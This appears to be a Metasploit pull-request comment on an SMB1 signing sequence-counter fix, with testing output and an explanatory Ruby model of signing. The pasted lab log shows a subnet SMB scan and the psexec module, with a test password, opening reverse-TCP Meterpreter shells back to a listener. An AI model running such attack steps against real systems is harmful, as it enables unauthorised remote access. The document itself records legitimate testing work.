According to the SMB specification, the signing example shows that we should always increment the sequence counter when interacting with the server - regardless of having a session_key present just yet:
> The client builds an SMB_COM_SESSION_SETUP_ANDX request SMB and sends it to the server.
> ...
> At this stage, the SessionKey is not yet available.
> ...
> After the packet is sent by the client, the sequence number is incremented to 1, which is the expected sequence number for the response packet from the server.
LGTM, tested with psexec and smb_login from Metasploit.
Testing Output
```
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 192.168.159.1:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-GCM) (signatures:required) (guid:{9cf46501-404c-4fd9-9708-aa9b1616c591}) (authentication domain:TOR)
[*] 192.168.159.11:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:9m 18s) (guid:{dffa5c50-e93d-4753-a4fc-0c698706f4db}) (authentication domain:WIN-9NSI4A6AIHJ)
[+] 192.168.159.11:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:WIN-9NSI4A6AIHJ) (workgroup:WORKGROUP)
[*] 192.168.159.0/24: - Scanned 26 of 256 hosts (10% complete)
[*] 192.168.159.0/24: - Scanned 52 of 256 hosts (20% complete)
[*] 192.168.159.0/24: - Scanned 77 of 256 hosts (30% complete)
[*] 192.168.159.96:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:) (encryption capabilities:AES-128-GCM) (signatures:required) (guid:{696d9eef-5586-401c-accb-133d43cb333e}) (authentication domain:MSFLAB)
^C[*] 192.168.159.0/24: - Caught interrupt from the console...
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_version) > use exploit/windows/smb/psexec
show o [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.250.134 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/smb/psexec) > set RHOSTS 192.168.159.11
RHOSTS => 192.168.159.11
msf6 exploit(windows/smb/psexec) > set SMBUser smcintyre
SMBUser => smcintyre
msf6 exploit(windows/smb/psexec) > set SMBPass Password1!
SMBPass => Password1!
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] 192.168.159.11:445 - Connecting to the server...
[*] 192.168.159.11:445 - Authenticating to 192.168.159.11:445 as user 'smcintyre'...
[*] 192.168.159.11:445 - Selecting PowerShell target
[*] 192.168.159.11:445 - Executing the payload...
[+] 192.168.159.11:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 192.168.250.237
[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 192.168.250.237:63414) at 2022-06-15 09:58:26 -0400
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.159.11 - Meterpreter session 1 closed. Reason: User exit
msf6 exploit(windows/smb/psexec) > set SMB::ProtocolVersion 1
SMB::ProtocolVersion => 1
msf6 exploit(windows/smb/psexec) > exploit
msf6 exploit(windows/smb/psexec) > exploit
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] 192.168.159.11:445 - Connecting to the server...
[*] 192.168.159.11:445 - Authenticating to 192.168.159.11:445 as user 'smcintyre'...
[*] 192.168.159.11:445 - Selecting PowerShell target
[*] 192.168.159.11:445 - Executing the payload...
[+] 192.168.159.11:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 192.168.250.237
[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:56247) at 2022-06-15 09:59:53 -0400
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.159.11 - Meterpreter session 2 closed. Reason: User exit
msf6 exploit(windows/smb/psexec) >
```
According to the SMB specification, the signing example shows that we should always increment the sequence counter when interacting with the server - regardless of having a session_key present just yet:
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb/8b80e60b-7514-442b-baf4-eb785d0b0e2c
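The counter behaviour described above, as an added Ruby example that is not code from this pull request or from the project: a simplified model of SMB1 signing shows why a client that only starts counting once it has a session key fails verification on its first signed request. `SigningPeer`, `smb1_signature`, the key and the message bodies are constructed for illustration, and the exchange is reduced to one unsigned request/response pair.

```ruby
require 'digest'

# Simplified model of SMB1 message signing (constructed for illustration).
# Signature = first 8 bytes of MD5(session_key + message), where the message's
# 8-byte signature field holds the sequence number (32-bit LE, zero padded).
def smb1_signature(session_key, sequence, body)
  field = [sequence, 0].pack('VV')
  Digest::MD5.digest(session_key + field + body)[0, 8]
end

# Hypothetical peer that tracks the signing sequence counter.
class SigningPeer
  attr_reader :sequence
  attr_accessor :session_key

  # count_before_key: false models the defect of only counting once a key exists.
  def initialize(count_before_key: true)
    @count_before_key = count_before_key
    @sequence = 0
    @session_key = nil
  end

  # Account for one packet sent or received; returns the number it consumed.
  def next_sequence
    used = @sequence
    @sequence += 1 if @session_key || @count_before_key
    used
  end

  def sign(body)
    smb1_signature(@session_key, next_sequence, body)
  end
end

# Run a constructed exchange: unsigned session setup request and response,
# then the key becomes available and the client signs its next request.
def first_signed_request_accepted?(client)
  server = SigningPeer.new
  key = 'constructed-key!'.b                  # sample 16-byte key, not a real one
  client.next_sequence; server.next_sequence  # SESSION_SETUP_ANDX request
  client.next_sequence; server.next_sequence  # SESSION_SETUP_ANDX response
  client.session_key = server.session_key = key
  body = 'TREE_CONNECT_ANDX (constructed body)'.b
  client.sign(body) == server.sign(body)
end
```

With `count_before_key: true` both sides sign with sequence number 2 and the signatures match; with `false` the client signs with 0 and the server rejects the packet.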